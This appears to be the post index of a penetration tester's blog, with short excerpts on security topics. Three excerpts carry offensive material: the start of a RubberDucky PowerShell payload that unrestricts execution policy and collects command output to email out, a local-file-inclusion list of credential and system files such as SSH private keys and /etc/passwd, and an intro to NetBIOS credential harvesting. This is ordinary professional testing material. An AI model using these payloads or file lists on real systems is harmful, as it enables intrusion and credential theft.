Static Sites in 2016
Mar 25, 2016
It’s early 2016, and there are a multitude of content management systems and blog platforms out there:
Wikipedia’s List of Content Management Systems
The security blog I contribute to, Penetrate.IO, runs on the venerable WordPress and requires constant updates to stay one step ahead of attackers. This becomes tiresome after a while, especially since the only thing I’m interested in hosting is a series of articles. These don’t require server-side computation, simply hosting.
Configure an Upstream Proxy for Burpsuite
Nov 5, 2015
I had the need to proxy traffic from Burpsuite to another proxy during web app testing this week. There are a few ways to do this, but this method was the easiest since I already had Burpsuite’s TLS certificate installed. For more information on this, see the Burpsuite help. To configure an upstream proxy for Burpsuite, such as OWASP ZAP, follow these steps:
First, configure your upstream proxy that will sit between Burpsuite and the web application to listen on a different port since they both bind TCP 8080 by default.
Make a connection
Sep 18, 2015
This post was inspired by a client who came to me and said “I do not understand all of these findings, can you explain them to me?”, referring to my web application penetration test deliverable. We spoke for an hour, as I described the various findings to him. I corrected him when his understanding was shaky, and I confirmed where his understanding was solid. He had a development background, and was studying for a security certification, but he was managing a large security project for a well-known company and I was surprised to learn he was a security newbie.
My Security 101
Jan 20, 2015
Adam Shostack recently published a great read on why the phrase “X is Security 101” is a hindsight-focused and generally not very useful statement.
I completely agree with his point that people who are (or pretend to be) security experts need to do more than flippantly make this remark when discussing the latest security story. [I think this is part of a larger, symptomatic issue the InfoSec community has, but I’m still formulating enough thoughts on that to publish a post on it].
RubberDucky Powershell Payload
Dec 22, 2014
On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments:
# Set execution policy to allow unrestricted script scope
Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
# Create results file in current user's temp directory
$results = $env:temp + '\results.
PHP, MySql, and Injection
Nov 26, 2014
Inspired by Jack Daniel’s “Shoulders of InfoSec Project”, this post will be focused on the people and technologies behind one of the most prevalent attacks on web sites: SQL injection.
Oct 6, 2014
URL Syntax
https://admin:pass123@www.example.com:80/bio.txt;pp=1&qp=2#Three

| URL Part | URL Data |
| --- | --- |
| Scheme | https |
| User | admin |
| Password | pass123 |
| Subdomain | www |
| Domain | example.com |
| Port | 80 |
| Path | /bio.txt |
| Path Parameter | pp=1 |
| Query Parameter | qp=2 |
| Fragment | Three |

Safe Characters
RFC1738 section 2.2 outlines the safe characters to use in an HTTP URL Scheme:
Oct 1, 2014
Unfortunately, I didn’t arrive at the ballroom early enough to get seats, or even standing room, to see this talk in-person:
Ed Skoudis: How To Give The Best Pen Test Of Your Life
If you’re a Pen Tester, this talk is a must-see. Once you’ve finished that talk, check out John Strand’s excellent follow-up talk!
After competing Friday night, most of Saturday, and Sunday morning, I emerged in 30th position (solo) out of the 120 teams competing in the CTF.
Local File Inclusion Mini-list
Sep 25, 2014
Version 0.1

Linux files
/etc/passwd
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/bashrc
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/etc/httpd/conf.d
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/init.d/apache2
/etc/mysql/my.cnf
/etc/nginx.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/opt/lamp/log/access_log
/opt/lamp/logs/error_log
/proc/self/environ
/proc/version
/proc/cmdline
/proc/mounts
/proc/config.gz
/root/.bashrc
/root/.bash_history
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/usr/local/apache/htdocs/index.html
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-ssl.conf
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access_log
/usr/local/apache/bin/apachectl
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/bin/apachectl
/usr/local/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/var/apache/logs/access_log
/var/apache/logs/access.log
/var/apache/logs/error_log
/var/apache/logs/error.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/httpd/error_log
/var/log/httpd/access_log

Windows files
C:\boot.ini
C:\apache\logs\access.log
C:\apache\logs\error.log
C:\Program Files\Apache Software Foundation\Apache2.
NetBIOS Name Spoofing and SMB
Jun 5, 2014
This is a fun technique for harvesting user credentials that still works: NetBIOS name spoofing. NetBIOS is a Session layer technology from the early 1980s that is still in use on networks today. Today, NetBIOS is used predominantly in Windows networks as the session service for Server Message Block (SMB), aka Common Internet File System (CIFS), an Application layer technology for sharing files, printers, and inter-process communication (IPC).